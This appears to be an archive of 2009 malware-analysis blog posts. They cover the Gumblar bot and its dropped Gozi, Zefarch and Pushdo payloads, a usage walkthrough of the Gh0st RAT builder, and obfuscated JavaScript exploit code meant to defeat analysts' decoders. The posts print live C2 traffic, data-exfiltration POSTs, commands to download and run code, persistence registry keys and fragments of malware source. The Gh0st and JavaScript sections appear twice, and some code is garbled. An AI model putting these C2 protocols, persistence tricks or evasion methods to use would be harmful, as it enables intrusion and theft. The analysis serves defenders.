New data: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll
The digiwet.dll malware is the core “Gumblar” bot. The malware initiates connections to the bot controller at 78.109.29.112 (Ukraine) and downloads 259043 bytes of data which includes additional malware. Additional C2 connections to 78.109.30.224 (Ukraine) were observed.
GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3970894049&rnd=981633 HTTP/1.1
Host: 78.109.29.112
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 Apr 2009 00:06:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Version: 1
Content-Length: 259043
Entity-Info: 1239013921:32768:1;1239013932:41984:1;1239013964:84480:2;1239022982:33792:2;1239024633:45568:2;1239875139:20451:2;
Rnd: 982306
Magic-Number: 256|1|40:21:222:188:141:149:35:113:122:238:96:131:88:202:90:82:137:127:146:127:209:5:235:94:57:25:53:42:127:239:54:168:4:21:100:145:170:136:3:37:118:100:168:206:47:2:33:184:129:179:55:83:185:35:177:242:60:231:29:188:214:84:100:218:105:201:108:19:81:112:57:199:212:225:150:3:228:183:188:102:107:243:186:36:23:108:23:83:83:52:16:41:136:116:4:241:62:112:5:143:225:62:87:182:32:238:186:5:166:118:107:17:106:38:54:129:146:77:213:229:129:229:14:10:90:19:251:152:132:1:40:101:64:128:27:97:111:213:102:21:75:210:39:181:248:93:55:138:170:12:112:44:242:127:54:77:146:50:229:22:51:14:123:115:143:151:213:254:108:59:20:184:14:59:110:6:152:165:145:67:178:1:111:164:128:165:241:19:215:215:41:11:230:164:126:117:60:84:116:168:143:136:97:157:195:207:164:92:117:54:159:39:55:14:204:184:180:189:203:139:149:245:150:124:154:21:241:214:105:102:127:249:238:224:151:178:176:59:14:37:113:173:77:169:187:25:98:112:215:46:251:108:35:146:233:189:
eON...#q~.`..5ZR1......^y.5*..6...d....%vd../.!...7S.#..
************************************************************************
GET /new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1239022982:unique_start;1239024633:unique_start;1239875139:unique_start HTTP/1.1
Host: 78.109.29.112
************************************************************************
POST /good/receiver/online HTTP/1.1
Host: 78.109.30.224
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
guid=397089404
************************************************************************
The downloaded data creates 4 temp files:
C:\WINDOWS\Temp\wpv451239013964.exe
C:\WINDOWS\Temp\wpv211239022982.exe
C:\WINDOWS\Temp\wpv781239024633.exe
C:\WINDOWS\Temp\wpv941239875139.exe
wpv451239013964.exe (Downloader)
The Temp file wpv451239013964.exe creates a trojan downloader. The malware creates:
C:\WINDOWS\system32\crypts.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "Asynchronous"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "DLLName"
Type: REG_SZ
Data: crypts.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "Impersonate"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "StartShell"
Type: REG_SZ
Data: Run
The malware connects to af9f440dcc.com (83.133.127.5, Germany) to receive instructions for additional malware downloads. The below connection returns instructions to download malware from spaeioer.com (68.180.151.74, US)
GET /bt.php?mod=&id=computername_-324073247&up=2667859&mid=soboc43 HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: af9f440dcc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Transfer-Encoding: chunked
X-Powered-By: PHP/5.2.6
Content-type: text/html
Date: Fri, 17 Apr 2009 00:42:08 GMT
Server: lighttpd/1.4.19
0SLP:3600;MOD:dAjvlbv5;URL:http://spaeioer.com/741l3.exe;SRV:stoped;
************************************************************************
GET /741l3.exe HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: spaeioer.com
Connection: Keep-Alive
************************************************************************
wpv211239022982.exe (Gozi)
The Temp file wpv211239022982.exe creates a Gozi variant. The malware monitors web connections and serves as an infostealer. The Temp file wpv211239022982.exe creates:
C:\WINDOWS\9129837.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ttool = "%Windir%\9129837.exe"
The file 9129837.exe creates:
C:\WINDOWS\new_drv.sys
HKEY_CURRENT_USER\Software\Microsoft\InetData "Data"
Type: REG_BINARY
Data: 28, 00, 00, 00, 00, A5, 01, DB, 00, 00, F1, 0C, 65, 30
HKEY_CURRENT_USER\Software\Microsoft\InetData "k1"
Type: REG_DWORD
Data: 15, AB, 0A, 85
HKEY_CURRENT_USER\Software\Microsoft\InetData "k2"
Type: REG_DWORD
Data: 91, CC, B1, 44
HKEY_CURRENT_USER\Software\Microsoft\InetData "version"
Type: REG_SZ
Data: 16
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "DisplayName"
Type: REG_SZ
Data: !!!!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ImagePath"
Type: REG_EXPAND_SZ
Data: \??\C:\WINDOWS\new_drv.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Start"
Type: REG_DWORD
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_NEW_DRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Security "Security"
Type: REG_BINARY
Data: [binary data]
The following services are stopped:
Application Layer Gateway Service
Windows Firewall/Internet Connection Sharing (ICS)
Security Center
The Gozi malware connects to 91.207.61.44 (Ukraine) and 212.117.165.54 (Luxembourg) for C2 and data exfiltration.
POST /cgi-bin/ppp.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28c6e728c6e728c6e7
User-Agent: IE
Host: 91.207.61.44
Content-Length: 231
Cache-Control: no-cache
----------------------------28c6e728c6e728c6e7
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
Forms:
----------------------------28c6e728c6e728c6e7--
************************************************************************
GET /cgi-bin/commm.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44
************************************************************************
GET /cgi-bin/ooo.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44
************************************************************************
POST /cgi-bin/ccc.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28cd6f28cd6f28cd6f
User-Agent: IE
Host: 91.207.61.44
Content-Length: 305
Cache-Control: no-cache
----------------------------28cd6f28cd6f28cd6f
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
0S...0...*.H.. .......0.0;0.0...+........z(W...g*{....5&.............*...Z...18m.....
----------------------------28cd6f28cd6f28cd6f—
************************************************************************
POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28ea2e28ea2e28ea2e
User-Agent: IE
Host: 91.207.61.44
Content-Length: 263
Cache-Control: no-cache
----------------------------28ea2e28ea2e28ea2e
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
URL: https://212.117.165.54/put.php
load=1
----------------------------28ea2e28ea2e28ea2e--
************************************************************************
POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------297799297799297799
User-Agent: IE
Host: 91.207.61.44
Content-Length: 3494
Cache-Control: no-cache
----------------------------297799297799297799
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
URL: https://212.117.165.54/put.php
type=jpg&img=/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAwANoDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb
************************************************************************
POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------2a3ea22a3ea22a3ea2
User-Agent: IE
Host: 91.207.61.44
Content-Length: 266
Cache-Control: no-cache
----------------------------2a3ea22a3ea22a3ea2
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
URL: https://212.117.165.54/put.php
confirm=1
----------------------------2a3ea22a3ea22a3ea2—
************************************************************************
wpv781239024633.exe (Zefarch)
The Temp file wpv781239024633.exe creates a Trojan. Zefarch variant. The malware monitors connections to various search engines and redirects search results to adware and malicious websites. The Temp file wpv781239024633.exe creates:
C:\WINDOWS\psbdxt.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Rzuwewi "Wjite"
Type: REG_BINARY
Data: 43, 01, 38, 03, 58, 05, 51, 07, 41, 09, 44, 0B, 48, 0D, 41, 0F, 47, 11, 41, 13, 48, 15, 66, 17, 6B, 19, 78, 1B, 78, 1D, 66, 1F, 54, 21, 0C, 23, 40, 25, 4A, 27, 44, 29, 2A, 2B
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Rzuwewi "Xlaheko"
Type: REG_SZ
Data: 61
wpv941239875139.exe (Pushdo)
The Temp file wpv941239875139.exe creates a Pushdo/Pandex/Cutwail variant. The malware serves as a spambot. The Temp file wpv941239875139.exe creates a file in the user profile directory with the same name as the actual profile name. In this example john.exe was created.
Creates:
C:\Documents and Settings\John\John.exe
A registry key is created to launch the malware at startup
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "John"
Type: REG_SZ
Data: C:\Documents and Settings\John\John.exe /i
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "John"
Type: REG_SZ
Data: C:\Documents and Settings\John\John.exe /i
The malware connected to 94.247.2.95 (Latvia) for C2.
GET /40E8001430303030303030303030303030303030303031306C0000009666000000007600000642EB00053059707A82 HTTP/1.0
Content-Type: application/octet-stream
Filename Size MD5
741l3.exe 72704 03aaccd01330f844d6c601df997fc1ff
9129837.exe 33792 096ffe693647f1ad8b2e86a8b7f05b44
crypts.dll 33280 1e6d7d0dcb2afcbf20b676f0992057bb
digiwet.dll 18432 3a1d598473469887fd0ed651b7ca96b8
flash.swf 16588 609d207cf010cbda0fcde027301cbd0e
John.exe 20451 eda1b7d3cdb3fb1a1c4e4ba2b51b46a7
load.exe 18432 4c328c15f6e8603f713fdacf7dac6e87
new_drv.sys 8192 a54de1d46ff7bdefbf9d9284c1916c5e
psbdxt.dll 45568 e075c7258f38b6581277552db80659f3
readme.pdf 15964 3e8da97b9f4da49498dfa31ae1c5c342
wpv451239013964.exe 84480 29d9286c42074702a96d94138a092450
wpv781239024633.exe 45568 27a9a6570b53d3dc1e9a24317f6f6fa6
Saturday, April 11, 2009
Gh0st Rat
On April 11, 2009, researchers at the Information Warfare Monitor released a report that uncovered a suspected cyber espionage network of over 1,295 infected hosts in 103 countries. The report "Tracking GhostNet: Investigating a Cyber Espionage Network" is summarized as:
"This report documents the GhostNet - a suspected cyber espionage network of over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs.
The capabilities of GhostNet are far-reaching. The report reveals that Tibetan computer systems were compromised giving attackers access to potentially sensitive information, including documents from the private office of the Dalai Lama. The report presents evidence showing that numerous computer systems were compromised in ways that circumstantially point to China as the culprit. But the report is careful not to draw conclusions about the exact motivation or the identity of the attacker(s), or how to accurately characterize this network of infections as a whole. The report argues that attribution can be obscured.
The report concludes that who is in control of GhostNet is less important than the opportunity for generating strategic intelligence that it represents. The report underscores the growing capabilities of computer network exploitation, the ease by which cyberspace can be used as a vector for new do-it-yourself form of signals intelligence. It ends with warning to policy makers that information security requires serious attention."
Gh0st RAT
GhostNet is a dubbed name for the C2 network of hosts infected with Gh0st RAT. The latest version of Gh0st RAT is Gh0st RAT Beta 3.6.
Gh0st RAT Beta 3.6 (English) Usage
Server Creation
The file gh0st_eng.exe is used to create the Gh0st RAT server dropper and serves as the C2 management console.
File: gh0st_eng.exe
Size: 712704
MD5: 88912D9FE630BEE510BD7E85D0F9331D
The setting tab provides the C2 listening port, proxy configurations, user and password, IP and port for the Gh0st RAT to connect to, and a string created by an algorithm based on the DNS/IP and port.
The Gh0st RAT Beta 3.6 source decode.h file contains the algorithm for the Key Strings creation.
static char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
static int pos(char c)
{
char *p;
for(p = base64; *p; p++)
if(*p == c)
return p - base64;
return -1;
}
int base64_decode(const char *str, char **data)
{
const char *s, *p;
unsigned char *q;
int c;
int x;
int done = 0;
int len;
s = (const char *)malloc(strlen(str));
q = (unsigned char *)s;
for(p=str; *p && !done; p+=4){
x = pos(p[0]);
if(x >= 0)
c = x;
else{
done = 3;
break;
}
c*=64;
x = pos(p[1]);
if(x >= 0)
c += x;
else
return -1;
c*=64;
if(p[2] == '=')
done++;
else{
x = pos(p[2]);
if(x >= 0)
c += x;
else
return -1;
}
c*=64;
if(p[3] == '=')
done++;
else{
if(done)
return -1;
x = pos(p[3]);
if(x >= 0)
c += x;
else
return -1;
}
if(done <>>16;
if(done <>>8;
if(done <>>0;
}
len = q - (unsigned char*)(s);
*data = (char*)realloc((void *)s, len);
return len;
}
char* MyDecode(char *str)
{
int i, len;
char *data = NULL;
len = base64_decode(str, &data);
for (i = 0; i <>
The build tab provides a C2 HTTP initial destination, and registry key parameters. The tool gives credit to C.Rufus Security Team and CoolDiyer. The source code ReadMe file included the following credits and links to the tool and demo.
Gh0st RAT
C.Rufus Security Team
http://www.wolfexp.net
http://www.wolfexp.net/other/Gh0st_RAT/index.html
http://www.wolfexp.net/other/Gh0st_RAT/demo.rar
In this example, the Gh0st RAT server was created as:
File: server.exe
Size: 112247
MD5: 7602AA86A58D68CCFD2E380BD6DA5158
Server Execution
The server component is intended to be executed on a victim system. The execution of server.exe results in the download of ip.jpg which contains the string that causes the redirect to the real C2 site.
GET /ip.jpg HTTP/1.0
User-Agent: Mozilla/4.0 (compatible)
Host: www.badsite.org
Pragma: no-cache
HTTP/1.1 200 OK
Date: Sat, 11 Apr 2009 18:13:58 GMT
Server: Apache
Last-Modified: Sat, 11 Apr 2009 18:06:35 GMT
ETag: "1bdecfd-20-49e0dc2b"
Accept-Ranges: bytes
Content-Length: 32
Connection: close
Content-Type: image/jpeg
AAAArqaxva61p72vva6xqaevnw==AAAA
Server.exe creates the dll file 6to4svc.dll in the system32 directory.
File: 6to4svc.dll
Size: 100352
MD5: 97D0CECEF133BBE59ABF3CB6D05226C3
The following registry keys register 6to4svc.dll as the service 6to4 with the display name Microsoft Device Manager.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Description"
Type: REG_SZ
Data: Service Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "DisplayName"
Type: REG_SZ
Data: Microsoft Device Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ImagePath"
Type: REG_EXPAND_SZ
Data: %SystemRoot%\System32\svchost.exe -k netsvcs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Type"
Type: REG_DWORD
Data: 20, 01, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_6TO4\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Parameters "ServiceDll"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\system32\6to4ex.dll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Security "Security"
Type: REG_BINARY
Data:[hex]
The Gh0st RAT server 6to4svc.dll connects to the C2 host destination.
Server Gh0st RAT Management
The Gh0st RAT C2 management console provides several options for manipulating a victim host. The C2 functionality can be observed at http://www.youtube.com/watch?v=qP-9qmSCe7o
"This report documents the GhostNet - a suspected cyber espionage network of over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs.
The capabilities of GhostNet are far-reaching. The report reveals that Tibetan computer systems were compromised giving attackers access to potentially sensitive information, including documents from the private office of the Dalai Lama. The report presents evidence showing that numerous computer systems were compromised in ways that circumstantially point to China as the culprit. But the report is careful not to draw conclusions about the exact motivation or the identity of the attacker(s), or how to accurately characterize this network of infections as a whole. The report argues that attribution can be obscured.
The report concludes that who is in control of GhostNet is less important than the opportunity for generating strategic intelligence that it represents. The report underscores the growing capabilities of computer network exploitation, the ease by which cyberspace can be used as a vector for new do-it-yourself form of signals intelligence. It ends with warning to policy makers that information security requires serious attention."
Gh0st RAT
GhostNet is a dubbed name for the C2 network of hosts infected with Gh0st RAT. The latest version of Gh0st RAT is Gh0st RAT Beta 3.6.
Gh0st RAT Beta 3.6 (English) Usage
Server Creation
The file gh0st_eng.exe is used to create the Gh0st RAT server dropper and serves as the C2 management console.
File: gh0st_eng.exe
Size: 712704
MD5: 88912D9FE630BEE510BD7E85D0F9331D
The setting tab provides the C2 listening port, proxy configurations, user and password, IP and port for the Gh0st RAT to connect to, and a string created by an algorithm based on the DNS/IP and port.
The Gh0st RAT Beta 3.6 source decode.h file contains the algorithm for the Key Strings creation.
static char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
static int pos(char c)
{
char *p;
for(p = base64; *p; p++)
if(*p == c)
return p - base64;
return -1;
}
int base64_decode(const char *str, char **data)
{
const char *s, *p;
unsigned char *q;
int c;
int x;
int done = 0;
int len;
s = (const char *)malloc(strlen(str));
q = (unsigned char *)s;
for(p=str; *p && !done; p+=4){
x = pos(p[0]);
if(x >= 0)
c = x;
else{
done = 3;
break;
}
c*=64;
x = pos(p[1]);
if(x >= 0)
c += x;
else
return -1;
c*=64;
if(p[2] == '=')
done++;
else{
x = pos(p[2]);
if(x >= 0)
c += x;
else
return -1;
}
c*=64;
if(p[3] == '=')
done++;
else{
if(done)
return -1;
x = pos(p[3]);
if(x >= 0)
c += x;
else
return -1;
}
if(done <>>16;
if(done <>>8;
if(done <>>0;
}
len = q - (unsigned char*)(s);
*data = (char*)realloc((void *)s, len);
return len;
}
char* MyDecode(char *str)
{
int i, len;
char *data = NULL;
len = base64_decode(str, &data);
for (i = 0; i <>
The build tab provides a C2 HTTP initial destination, and registry key parameters. The tool gives credit to C.Rufus Security Team and CoolDiyer. The source code ReadMe file included the following credits and links to the tool and demo.
Gh0st RAT
C.Rufus Security Team
http://www.wolfexp.net
http://www.wolfexp.net/other/Gh0st_RAT/index.html
http://www.wolfexp.net/other/Gh0st_RAT/demo.rar
In this example, the Gh0st RAT server was created as:
File: server.exe
Size: 112247
MD5: 7602AA86A58D68CCFD2E380BD6DA5158
Server Execution
The server component is intended to be executed on a victim system. The execution of server.exe results in the download of ip.jpg which contains the string that causes the redirect to the real C2 site.
GET /ip.jpg HTTP/1.0
User-Agent: Mozilla/4.0 (compatible)
Host: www.badsite.org
Pragma: no-cache
HTTP/1.1 200 OK
Date: Sat, 11 Apr 2009 18:13:58 GMT
Server: Apache
Last-Modified: Sat, 11 Apr 2009 18:06:35 GMT
ETag: "1bdecfd-20-49e0dc2b"
Accept-Ranges: bytes
Content-Length: 32
Connection: close
Content-Type: image/jpeg
AAAArqaxva61p72vva6xqaevnw==AAAA
Server.exe creates the dll file 6to4svc.dll in the system32 directory.
File: 6to4svc.dll
Size: 100352
MD5: 97D0CECEF133BBE59ABF3CB6D05226C3
The following registry keys register 6to4svc.dll as the service 6to4 with the display name Microsoft Device Manager.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Description"
Type: REG_SZ
Data: Service Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "DisplayName"
Type: REG_SZ
Data: Microsoft Device Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ImagePath"
Type: REG_EXPAND_SZ
Data: %SystemRoot%\System32\svchost.exe -k netsvcs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Type"
Type: REG_DWORD
Data: 20, 01, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_6TO4\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Parameters "ServiceDll"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\system32\6to4ex.dll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Security "Security"
Type: REG_BINARY
Data:[hex]
The Gh0st RAT server 6to4svc.dll connects to the C2 host destination.
Server Gh0st RAT Management
The Gh0st RAT C2 management console provides several options for manipulating a victim host. The C2 functionality can be observed at http://www.youtube.com/watch?v=qP-9qmSCe7o
Tuesday, January 20, 2009
Evading JavaScript Decoders?
I was recently provided exploit code that appears to be designed to evade analysts using decoding tools such as Malzilla. Obfuscation techniques continually evolve, but it is interesting when malcoders utilize techniques to deliberately mess with analysts.
In the past, I've seen exploit code writers throw in a closing </textarea> tag nullifying the technique of using textarea tags to manipulate document.write script. An older method of decoding JavaScript was to change script like document.write(r) to document.write("<textarea>"+r+"</textarea>"). The output would be placed in an html textarea object. The following decoded sample reveals a closing textarea tag which renders the decoding technique useless.
</textarea><html>
<head>
<title></title>
<script language="JavaScript">
var memory = new Array();
var mem_flag = 0;
function having() { memory=memory; setTimeout("having()", 2000); }
A recent example originated from various advertising content that redirected to srv(dot)ad-adnet(dot).net/code/smain.php?scout=jvcxeng. The sv.ad-adnet.net request returned obfuscated code.
<script language="javascript">
var enschr="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var i;var enschrs=new Array();for(i=0;i<enschr.length;i++){enschrs[i]=enschr.charAt(i);}var rvenchr=new Array();for(i=0;i<enschrs.length;i++){rvenchr[enschrs[i]]=i;}var ensstr, enscnt;function sensstr(str){ensstr=str;enscnt=0;}function rrvren(){if(!ensstr) return -1;while(true){if(enscnt >= ensstr.length) return -1;var [truncated]...
In this example, Malzilla is used to decode the eval function.
The eval() function is replaced in Malzilla with the decoded result and decoded again. It looks like the second decoded result is “---“.
The “---“ appears to be used to make analysts think they received a result or lack of a result. The decoded content contains a bunch of whitespace that requires the analyst to scroll down to see the exploit code. The only explanation is the bad guys are attempting to to throw analysts off.
It's isn't an elaborate effort, but it is interesting to know the bad guys know that analysts are looking at and decoding their exploit code and are trying to counteract analyst techniques with a wide variety of TTPs.
In the past, I've seen exploit code writers throw in a closing </textarea> tag nullifying the technique of using textarea tags to manipulate document.write script. An older method of decoding JavaScript was to change script like document.write(r) to document.write("<textarea>"+r+"</textarea>"). The output would be placed in an html textarea object. The following decoded sample reveals a closing textarea tag which renders the decoding technique useless.
</textarea><html>
<head>
<title></title>
<script language="JavaScript">
var memory = new Array();
var mem_flag = 0;
function having() { memory=memory; setTimeout("having()", 2000); }
A recent example originated from various advertising content that redirected to srv(dot)ad-adnet(dot).net/code/smain.php?scout=jvcxeng. The sv.ad-adnet.net request returned obfuscated code.
<script language="javascript">
var enschr="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var i;var enschrs=new Array();for(i=0;i<enschr.length;i++){enschrs[i]=enschr.charAt(i);}var rvenchr=new Array();for(i=0;i<enschrs.length;i++){rvenchr[enschrs[i]]=i;}var ensstr, enscnt;function sensstr(str){ensstr=str;enscnt=0;}function rrvren(){if(!ensstr) return -1;while(true){if(enscnt >= ensstr.length) return -1;var [truncated]...
In this example, Malzilla is used to decode the eval function.
The eval() function is replaced in Malzilla with the decoded result and decoded again. It looks like the second decoded result is “---“.
The “---“ appears to be used to make analysts think they received a result or lack of a result. The decoded content contains a bunch of whitespace that requires the analyst to scroll down to see the exploit code. The only explanation is the bad guys are attempting to to throw analysts off.
It's isn't an elaborate effort, but it is interesting to know the bad guys know that analysts are looking at and decoding their exploit code and are trying to counteract analyst techniques with a wide variety of TTPs.
Subscribe to:
Posts (Atom)